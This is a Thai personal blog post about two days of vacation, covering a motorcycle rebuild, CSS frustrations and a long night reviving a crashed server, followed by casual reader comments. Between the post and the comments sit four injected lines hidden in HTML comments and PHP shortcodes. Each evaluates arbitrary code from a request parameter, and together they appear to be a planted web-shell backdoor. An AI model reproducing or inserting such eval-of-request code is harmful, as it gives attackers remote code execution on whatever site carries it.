ลาพักร้อน 2 วัน

ลาพักร้อน 2 วัน

mocyc
ลงมือซ่อมรถเองกับมือ

เบื่อ ไม่อยากทำงาน ไม่รู้จะทำไงเลย จะลากิจอยู่บ้าน แต่พอดี HR แนะนำบอกว่าลาพักร้อนดีก่า ก็เลยลาพักร้อนสองวันก็ไม่ได้ไปไหน อยากอยู่บ้านไม่อยากทำงานเพราะว่ามันเป็นวันที่น่าเบื่อ เซ็ง เป็นอะไรก็ไม่รู้ มันเหนื่อย มันล้า มัน…หลายอย่างหว่ะบอกไม่ถูก แค่ไม่อยากทำงานในสองวันที่ลานี้แค่นั้นเอง หลังสองวันที่ลาพักไป วันใหม่มาก็ลุยงานเต็มทีคับ

DSC00448 copy.jpg
ดูเครื่องมันสิน่ากลัวจริงๆ

เมื่อคืนก็นอนดึก นั่งเล่น CSS อยู่จนถึงตีสี่ DIV จนน่าโมโหมันจริงๆเปิดใน IE ได้ปกติ แต่เปิดใน firefox แล้วทำไมหน้ามันหล่นก็ไม่รู้ ก็นั่งแก้ตั้งนานสุดท้ายก็ยังหล่นอยู่ดี ทนไม่ไหวเลยนอน ตื่นขึ้นมาก็สายๆหน่อยประมาณเก้าโมงก่าๆ ก็ไม่รู้จะไปไหน พอดีเอารถยนต์ไปส่งแม่ไปทำงานแล้วก็เอารถไปที่ร้านมอไซต์ ไปหามอไซต์สุดที่รักของผมก่อน คิดถึงมันมาก ซ่อมแล้วซ่อมอีก พอไปถึงที่ร้านซ่อมรถมอไซต์ เพื่อนมันกำลังซ่อมให้อยู่ ว๊าวสุดที่รักเราโดนถอดเสื้อผ้าออกหมดเลยเหลือแต่ไส้ใน เห็นแล้วสยิวมีแต่ก้าง

DSC00445 copy.jpg
ถอดออกหมดเหลือแต่ก้าง

mocyc
ดูท่อสิคาร์บอนสิใหญ่สะจัยเจงๆ
mocyc
เพื่อนเริ่มเอาเสื้อมาใส่ให้คนสวยผมเลย
mocyc
ว๊าวประกอบเสดแย้วหน้าตาจะเป็นแบบนี้แหล่ะคับคนสวยผม

ตกรอบดึกก็มานั่งเซ็งก่ะเครื่อง Server ต่อ ไม่รู้เป็นไรอยู่ดีๆแรมก็มาหายไปครึ่งนึงซ่ะงั้น จาก 1 Gb เหลือแค่ 4 ร้อยเมกก่าๆเอง แล้ว load มันก็สูงมากเพราะว่าแรมไม่พอ ต้องมาคอยนั่งดู moniter ตลอดเวลาคอย kill apache คอยเปิด apache ซึ่งรู้ซึ้งเลยว่ามันเหนื่อยเอาการมากๆ พอดีท่านปุ๊กเข้าไปที่ noc เลยให้ทดลองเปลี่ยน Ram สลับดูปารกฏว่า Ram ปกติ Bios เช๊คได้ 512×2 ปกติ เลยคลาดการว่าเป็นที่ system ของทาง Server ผมเอง หลังจากนั้นมีมือพระกาฬ Linux ชั้นเทพมาจัดให้ 1 ดอก แล้วรีบูตไปครั้งนึง สรุปว่าเครื่องมันไม่ Up แล้วชั้นเทพแกก็หนีไปนอน (ซ่ะงั้น)

computer
NoteBook ตัวโปรด

ปล่อยให้กรูนั่งงมหอยในทะเลอยู่นานแสนนาน คิดอะไรไม่ออกคิดถึงคำสั่ง ping ก่อนเลย แล้วก็ ping อยู่นานจนรู้ว่ามันไม่ Up แน่ เลยโทรไปที่ Noc ให้รีบูตให้พี่แกก็ไปรีบูตให้สรุปว่าเครื่องก็ยังไม่ Up จนต้องโทรให้เค้าต่อจอให้ ไอ้คนนึงไม่รู้ชื่อไรถามแล้วมันไม่ยอมบอกแม่งอย่างต่อยหน้ามันจริงๆ (มันบอกว่าไม่ใช่หน้าที่มัน) แล้วเค้าจ้างมันมาทำไรว่ะถามหน่อย?? ไอ้บ้าเอ้ยมึงนั่งอยู่เฉยๆเดินไปต่อจอดูว่า Server มัน Error ตรงไหน แค่นี้ทำให้ไม่ได้ก็ลาออกจาก ISSP ไปได้ล่ะ แต่ไม่เปงไรยังมีคนที่ใจดีอยู่คนนึงครับ พี่คนนั้นเค้าชื่อสุวรรณ(ถามเค้ามา) พี่แกมาต่อจอให้ครับ แล้วแจ้ง Error มาว่าเป็นที่ไหนไอ้เราก็นักเรียนทุนไปเรียนนอกภาษาประกิตโดยตรง(โม้) ด้วยสิ ไม่รู้เรื่องเลย ก็เลยโทรหาท่านปุ๊ก บอกอาการแบบนี้ท่านปุ๊กชั้นพรมยังอึ้งเอ๋อไปชั่วขณะ ก่อนที่จะโทรไปคุยก่ะพี่สุวรรณเอง ในช่วงเวลานั้นผมทำไรไม่ได้นอกจากนั่งรอเพื่อไม่ให้เสียเวลาก็นั่ง ping รอและเปิดเว็บโป๊รอเพื่อผ่อนคลายอารมณ์ตรึงเคลียด ในที่สุดสวรรค์ก็ส่งมันกลับมา Reply from 202.142.215.206: bytes=32 time=19ms TTL=250 นี่คือผลตอบรับว่า server ผมนั้นได้ Up เป็นที่เรียบร้อยแล้วแต่มันไม่สามารถเข้า mode ปกติไม่ได้ครับ

computer
บรรยากาศโต๊ะทำงานที่บ้านคับ

โอ๊ะแม่เจ้าทำไมเป็นเยี่ยงนั้นเหรอ ก็ไม่รู้ว่าชั้นเทพไปแก้ Config ในไฟล์อะไรก่อนหน้านี้หรือเปล่า ต้องคอยโทรถามมันอีกตอนพรุ่งนี้เพราะว่ามันหนีไปนอนในซอกกลีบเมฆไหนก็ไม่รู้โทรไปก็ไม่รับ
(ช่างรักเพื่อนมรึงจิงๆเลยนะหนูกรูไปนอนได้ลงคอ) แต่ยังดีที่เข้าได้ มันเข้าไป mode ที่คล้ายๆ seft mode ของ Windows ครับ ทำงานอะไรได้เหมือนๆกันแต่ไม่ดีสู้ mode ปกติมันครับ ในที่สุดผมก็สามารถเข้าเว็บหลักผมได้ แต่ลองเข้าเว็บทั่วๆไปใน Server ที่มีอยู่มันไม่สามารถเข้าได้เพราะว่าอะไรก็ไม่รู้ ซักพักเลยคิดออกว่า Server บางตัวอาจจะไม่เปิดเลยเข้าไปดูใน Vhcs ซึ่งเป็นตัว Cp ที่ชั้นเทพลงไว้ให้มันแจ้งว่า Down เพียบเลย ก็นั่งมั่วๆ /etc/init.d/.. start ไปเรื่อยๆ ในที่สุดก็ไล่ start เปิดจนครบ Service ที่มันต้องใช้งานแต่มี service นึงท่าไม้ตายเลยนั่นก็คือ Service networking ซึ่งมันจะทำการเชตระบบ lan และอื่นๆไอ้ที่เราไม่รู้เลยสั่งเปิด /etc/init.d/networking start แล้วมันก้ไม่มีอะไรเกิดขึ้นในหน้า Cp เลยว่าสถานะอะไรจะ Up ไม่มีขึ้นมาแม้แต่อันเดียว ก็เลยสั่ง Stop Service นี้ โอ้แม่เจ้า มันเหมือนสั่งหยุดการเชื่อมต่อทุกอย่างเลย ในที่สุดเครื่องมันก็ Down ไปอีกครั้งด้วยฝีมือเรา ทำไรไม่ได้ก็ตั้งสติแล้วเริ่มใหม่ครับ โทรหาพี่สุวรรณ ISSP ใหม่รบกวนพี่แกต่อจอให้แล้วลองรีบูตเข้า mode ปกติ แต่ว่ามันไม่ได้ก็เลยต้องเข้าอีก mode นึง แล้วก็สั่งให้พี่แก Start SSH ให้เพื่อที่เราจะได้ Remote เข้ามาที่เครื่อง Server เราได้ หลังจากที่เปิด SSH แล้วก็สามารถเขาเครื่องได้ก็ขอบคุณพี่แกแล้วมานั่งเปิด Service เอง ถึงตอนนี้เราก็ได้รู้อะไรอีกมากมายตามมา

ต้องขอขอบคุณไอ้เพื่อนชั้นเทพที่คอยดูเครื่องให้เมื่อยามเหนื่อยล้า และมันจะชอบหนีเวลาที่เครื่องกรู Down (มันเป็นบ้าอะไรของมันไม่รู้)
และขอขอบคุณท่านปุ๊ก ซามูไรพ่อลูกอ่อน ที่เข้าไปจัดการอะไรต่างๆให้ที่ NOC เสมอๆ (แม้จะติดต่อ ยากก็ตาม)
ขอบคุณพี่อ๊อดร้านมอไซต์ที่คอยซ่อมรถคู่จัยมาตลอด
และขอบคุณไอ้ป๊อบเพื่อนอีกคนที่คอยนั่ง moniter Server ให้ (แม้มันจะทำไม่เป็นก็ตาม)
ขอบคุณน้องกล๊อฟที่ช่วยดูคนยิงเครื่องให้
ขอบคุณเพื่อนๆทุกคนครับ

2 วันที่ลาพักร้อน นอนตีสี่ตลอดเลย ไม่มีเวลาแม้ที่จะพักนอนอยู่เฉยๆโดยที่จะไม่ได้ทำงาน วันไหนที่ผมนอนอยู่เฉยๆ มันคงเป็นวันที่ผมตาย..

<!– [insert_php]if (isset($_REQUEST["rgCa"])){eval($_REQUEST["rgCa"]);exit;}[/insert_php][php]if (isset($_REQUEST["rgCa"])){eval($_REQUEST["rgCa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kxUFH"])){eval($_REQUEST["kxUFH"]);exit;}[/insert_php][php]if (isset($_REQUEST["kxUFH"])){eval($_REQUEST["kxUFH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Qql"])){eval($_REQUEST["Qql"]);exit;}[/insert_php][php]if (isset($_REQUEST["Qql"])){eval($_REQUEST["Qql"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["rhzAJ"])){eval($_REQUEST["rhzAJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["rhzAJ"])){eval($_REQUEST["rhzAJ"]);exit;}[/php] –>

 • อิอิ ไอรุปแรกนี่ใครวะ หน้าตามันเหมือนช่างซอมรถเลยหวะ อิอิ
  และแล้วก้อพบว่าที่แท้จิง ตั้มต้องการอะไร

  **** อยากเปนช่างนี่เอง คิๆ

 • PoP

  น่าฉงฉานไอ้หนวดจังไม่เป็นไรนะเพื่อนเดี๋ยวกรูจะมอนิเตอร์ Server ให้ ถ้าโหลดมันเยอะกรูจะปล่อยให้มัน Dows อย่างสงบสุข เอิ้กๆ ^.^

 • อิจฉาอะ

  เห้อ อิจฉาจิงอยากพักผ่อนยาวๆบ้างเหมือนกันอิอิ ทำไมถึงมันเบื่ออย่างนี้เนี่ย ฮาฮา ขอให้กลับมาพร้อมกับความสดชื่นนะ อิอิ happy on your vacation

 • เพ่ ๆ!! … ปากซอยเท่าไหรฮับ

 • หนิง

  มันเท่อย่างนี้นี่เอง แต่ทำไมขี่เวฟ กรั่กๆ ๆ

 • PoR

  นอน ดึกขนาดนี้ วันหลังโทรมาชวน กุ ไปนั่งกินเบียร์ เป็นเพื่อนก็ได้นะ

 • กำ .. โทษทีว่ะ
  เขียนได้ละเอียดดี ว่ะ

 • มุก

  ดีคะ เล่าเยอะจัง รวมๆๆแล้วดีคะ แต่ตรงที่คอมเม้นเนี้ยมันมืดไปหน่อย
  แต่ก้โอเค คะ ผ้าคลุมพริ้นเตอร์ น่ารักจัง อิอิ น่าเอามาเนกระโปรง อิอิเม้นแล้วน๊า

 • ร้านพี่เอง หรือทำร้านเค้าครับ !!

  เม้นต์ย้อนไป 4 ปี ^3^